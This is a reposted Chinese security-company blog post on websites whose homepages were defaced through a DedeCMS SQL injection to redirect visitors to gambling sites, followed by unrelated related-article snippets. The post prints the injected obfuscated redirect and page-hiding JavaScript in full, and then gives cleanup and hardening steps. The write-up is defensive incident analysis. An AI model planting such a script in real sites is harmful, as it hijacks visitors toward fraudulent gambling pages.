网站被黑提醒该站点可能受到黑客攻击,部分页面已被非法篡改

news/2024/5/15 7:16:36/文章来源:https://blog.csdn.net/weixin_33770878/article/details/92418755

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

大清早的一上班收到3个网站客户的QQ联系,说是自己公司的网站被跳转到了北京sai车,cai票,du博网站上去了,我们SINE安全公司对3个网站进行了详细的安全检测,发现这3个客户的网站都是同样的症状,网站首页文件index.php,index.html都被篡改添加了恶意的代码。网站在百度的快照也被更改成了这些cai票,bo彩的内容了,并被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!如下图所示:

37870b157ba043dfa2ffe9d4d799bb65.png

从百度点击网站进去,会直接跳转到bo彩,du博网站上去,直接输入3个公司的网站地址是不会跳转的,点击跳转的时候会被360拦截掉,提示如下图:

b31cc165eeb4442bb14716cbf6b03417.png

360安全中心提醒您:未经证实的bo彩du博网站,您访问的网站含有未经证实的境外bo彩或非法du博的相关内容,可能给您造成财产损失,请您谨慎访问。

我们SINE安全技术通过对3个客户网站的代码的安全分析,发现都被攻击者上传了网站木马后门,php大马,以及一句话木马后门都被上传到了客户网站的根目录下,网站的首页文件都被篡改了,包括网站的标题,描述,TDK都被改成了bo彩,cai票,du博的内容,客户说之前还原了网站首页文件,过不了多久还是被篡改,被跳转,导致客户网站在百度的权重直接降权,网站在百度的关键词排名都掉没了,损失惨重。网站被反复篡改的原因根本是网站代码存在漏洞,需要对网站漏洞进行修复,以及做好网站安全加固,清除木马后门才能彻底的解决问题。

我们来看下网站首页被篡改的症状:

title keywords deion都被篡改了,内容都是加密的字符:

<title>&#65279&#x5317&#x4eac&#36187&#x8f66&#112&#107&#49&#x30&#32&#80&#x4b&#x31&#x30&#24320&#x5956&#x76f4&#25773&#x20&#21271&#20140&#x8d5b&#36710&#112&#x6b&#49&#x30&#24320&#22870&#x8bb0&#24405&#45&#112&#107&#x31&#x30&#x5f00&#22870&#35270&#39057&#30452&#25773</title>

342da603f6114a949c798b9b7a27a3ed.png

通过url解密发现这些内容都是北京sai车,北京pk10,pk10北京PK开奖等cai票的网站关键词,简单来讲就是网站的标题内容都被攻击者改成了cai票,bo彩的标题,利用网站自身在百度的权重,做他们自己的关键词排名。

网站被跳转的代码也被我们SINE安全技术找了出来,如下:

function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '<center id="yangchen"><ifr' + 'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14' + '00" height="8' + '50" src="att=rgyh8"></iframe></center>'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();

知道问题的所在,以及网站被攻击的症状,那么该如何解决问题?

首先登陆客户网站的服务器,打包压缩客户的网站代码下载到我们本地的工作电脑,对其进行详细的安全检测,以及网站漏洞检测,网站木马后门检测,以及网站日志下载分析,发现其中一个网站使用的是dedecms系统开发网站,网站存在sql注入漏洞,导致网站的管理员账号密码被sql注入获取到,默认的管理员后台地址dede没有改,导致攻击者直接登录后台上传了木马到网站里了。针对dedecms的sql注入漏洞进行了修复,清除掉网站存在的木马后门,对网站安全进行加固问题得以解决。

对dedecms的目录安全权限进行设置 /data目录取消脚本执行权限,给与写入权限,templets模板文件夹也是同样的安全部署,取消php脚本的执行权限,开启写入权限,dede后台的目录给只读权限,uploads上传目录给写入,取消php脚本权限。

至此客户网站首页被篡改的问题得以解决,百度的拦截也是需要去除的,清除恶意链接代码,修复网站漏洞,防止以后网站被篡改,做好网站安全后,再提交给百度安全中心人工审核,就可以解除百度的拦截,如果您对网站漏洞修复不熟悉的话,可以找我们SINE安全来修复网站漏洞,解决百度拦截。

转载于:https://my.oschina.net/u/3887295/blog/3005941

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_749385.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

大型网站技术架构(八)网站的安全架构

2019独角兽企业重金招聘Python工程师标准>>> 从互联网诞生起&#xff0c;安全威胁就一直伴随着网站的发展&#xff0c;各种Web攻击和信息泄露也从未停止。常见的攻击手段有XSS攻击、SQL注入、CSRF、Session劫持等。 1、XSS攻击 XSS攻击即跨站点脚本攻击&#xff08;…

仿站小工具(获取网站源资源)

仿站小工具 仿站小工具是通过网址下载静态网页的工具。从输入的网址下载html代码&#xff0c;提取出JS、Css、Image、Picture、Flash等静态文件网址&#xff0c;再从下载完好的Css代码中提取出Image静态文件网址&#xff0c;通过网址下载静态文件&#xff0c;根据软件设置好的…

系统项目发布网站

自己做好了一个系统项目后&#xff0c;可以让第二个人随时随地访问&#xff0c;就需要将项目发布到网站上&#xff0c;web端&#xff0c; 1.在VS2012中打开自己的项目&#xff0c;选中项目&#xff0c;右键-发布网站 2. 弹出窗口“发布网站”&#xff0c;“目标位置”&#xf…

安装IIS8.0,ASP以及相关配置,网站搭建

第一大步&#xff0c;请参照这个链接 https://blog.csdn.net/lq18804095672/article/details/106541099 第二大步&#xff0c;在服务器123上&#xff0c;安装IIS8.0 1.找到“服务器管理器”&#xff0c;点击“添加角色和功能”&#xff0c; 2.“添加角色和功能向导”窗口&…

解决网站无法复制文字

1、以360浏览器为例 2、打开一个正常的网页&#xff0c;右键----审查元素 3、在地址栏中输入无法复制内容的网址&#xff0c;即可对所选文件进行指向&#xff0c;然后复制了 以上方法可以复制一段文字&#xff0c;如果要想快速复制整篇&#xff0c;采用如下方法&#xff0c;选…

USBWebserver(网站架设工具)

USBWebserver是一款免费的电脑网站架设工具。该软件可以让用户快速搭建PHP Version、Apache、PhpMyAdmin、MySQL等网站运行必备的主机套件&#xff0c;让你轻轻松松构架自己的网站。 USBWebserver 是款非常好用的一键式本地电脑快速架设PHP网站环境的工具 USBWebserver集成了Ap…

nginx服务器的网站权限问题

有时候我们的网站根目录会从一个目录迁移到另一个目录&#xff0c;如果我们服务器使用的是nginx或者Apache&#xff0c;我们一般会配置好网站根目录后然后往直接把网站解压或者上传到根目录中&#xff0c;这样引起的问题是无法对对文件进行任何的操作导致网站的异常&#xff0c…

网站统计51LA数据引用功能详解及添加方法

新版51啦于2018年6月20日上线数据引用功能&#xff01;新手站长网来说说数据引用功能的介绍以及使用方法&#xff1a; 什么是数据引用功能&#xff1f;51la数据引用简单来讲&#xff0c;就是把你网站的实时在线人数&#xff0c;今天访问量、昨天访问量、本月访问量、本月总访问…

Chrome68将所有HTTP网站标记为不安全!你的网站HTTPS了吗?

为了使网络更加安全&#xff0c;让更多的互联网用户使用其 Chrome 浏览器&#xff0c;Google 宣布&#xff0c;未来的 Chrome 版本将把所有的 HTTP 网站标记为“不安全&#xff08;non-secure&#xff09;”。Chrome68将所有HTTP网站标记为不安全Chrome68在7月将自动标记HTTP为…

阿里云网站域名备案流程全过程(图文讲解)

阿里云网站备案备案很简单&#xff0c;阿里云有专门的备案客服&#xff0c;整个备案过程阿里云百科网分成三部分&#xff1a;备案前提备案中信息填写和材料提交备案等待&#xff0c;阿里云百科网图文讲解阿里云域名备案全过程&#xff1a; 备案前提 网站备案前提准备&#xf…

网站域名备案密码的获取方法

什么是备案密码&#xff1f;备案密码是工信部给的&#xff0c;每个ICP备案号都有一个由工信部颁发的专属密码&#xff0c;备案君分享备案密码的获取方法&#xff1a; 什么是备案密码&#xff1f; 每个ICP备案号都有一个由工信部颁发的专属密码&#xff0c;解铃还须系铃人&…

阿里云服务器新手教程从选配到网站上线全过程

阿里云服务器新手教程从云服务器选配购买、云服务器配置到网站上线全过程&#xff0c;阿里云服务器如何购买&#xff1f;购买后如何使用&#xff1f;新手站长抽时间写了一篇详细的阿里云服务器新手教程&#xff0c;从云服务器选配到网站上线全过程&#xff1a; 阿里云服务器新…

腾讯云服务器安装WordPress网站博客菜鸟教程

WordPress博客网站基于PHP语言&#xff0c;腾讯云服务器安装WordPress所需PHP、MySQL环境&#xff0c;服务器系统无论是Windows还是Linux均可安装WordPress&#xff0c;新手站长网来详细说下使用腾讯云服务器搭建WordPress网站博客菜鸟入门教程&#xff1a; 腾讯云服务器安装W…

使用腾讯云服务器安装WordPress网站图文教程(2步搞定)

腾讯云服务器安装WordPress博客网站教程&#xff0c;腾讯云百科使用Linux镜像系统&#xff0c;先安装宝塔面板搭建LNMP环境&#xff0c;然后在宝塔面板上安装WordPress博客程序&#xff0c;腾讯云百科来详细会说下腾讯云服务器安装WordPress图文教程&#xff08;2步搞定&#x…

腾讯云2核4G服务器搭建网站支持多少人同时在线?3M带宽并发数计算

腾讯云服务器2核4G3M带宽搭建网站&#xff0c;可以支持多少人同时在线&#xff1f;网站程序不同效率不同&#xff0c;不仅要考虑CPU内存计算资源&#xff0c;还要考虑3M公网带宽速度方面&#xff0c;腾讯云3M带宽下载速度384KB/秒&#xff0c;新手站长来详细说下腾讯云2核4G3M带…

使用云服务器搭建网站选阿里云还是腾讯云?

购买云服务器用于搭建网站腾讯云和阿里云哪个更好一些&#xff1f;无论是阿里云还是腾讯云均提供云服务器和轻量应用服务器&#xff0c;如果是只需要购买一台云服务器的单机Web应用&#xff0c;从性价比的角度考虑&#xff0c;可以优先选择轻量应用服务器&#xff0c;新手站长网…

网站域名在腾讯云备案可以使用阿里云服务器吗?

之前在腾讯云买过云服务器&#xff0c;网站域名在腾讯云已经备案成功了&#xff0c;可以使用阿里云服务器吗&#xff1f;不可以&#xff0c;域名解析到阿里云服务器开始正常可以访问&#xff0c;过一会就会被阻断&#xff0c;需要将备案信息接入阿里云&#xff0c;云服务器吧来…

使用阿里云服务器安装宝塔面板搭建网站教程(图文全流程)

阿里云服务器安装宝塔面板教程&#xff0c;云服务器吧以阿里云Linux系统云服务器安装宝塔Linux面板为例&#xff0c;先配置云服务器安全组开放宝塔所需端口8888、888、80、443、20和21端口&#xff0c;然后执行安装宝塔面板命令脚本&#xff0c;最后登录宝塔后台安装LNMP&#…

阿里云建站云企业官网标准版、高级版和尊贵版区别对比表

阿里云建站云企业官网标准版、高级版和尊贵版有什么区别&#xff1f;新手站长网分享阿里云建站定制云企业官网版本功能区别亮点及选择方法&#xff1a; 云企业官网标准版/高级版/尊贵版对比 阿里云建站云企业官网定制分为标准版、高级版和尊贵版三个版本&#xff0c;现在又推…

公司搭建企业官网流程域名、云服务器和建站程序

企业网站建站流程以阿里云为例&#xff0c;不仅提供云服务器、网站建设和域名业务&#xff0c;还提供公司注册及资质办理的业务&#xff0c;新手站长网来详细说下使用阿里云搭建企业网站的全流程&#xff0c;可选两套方案&#xff1a; 阿里云搭建企业网站全流程 本文是给初次…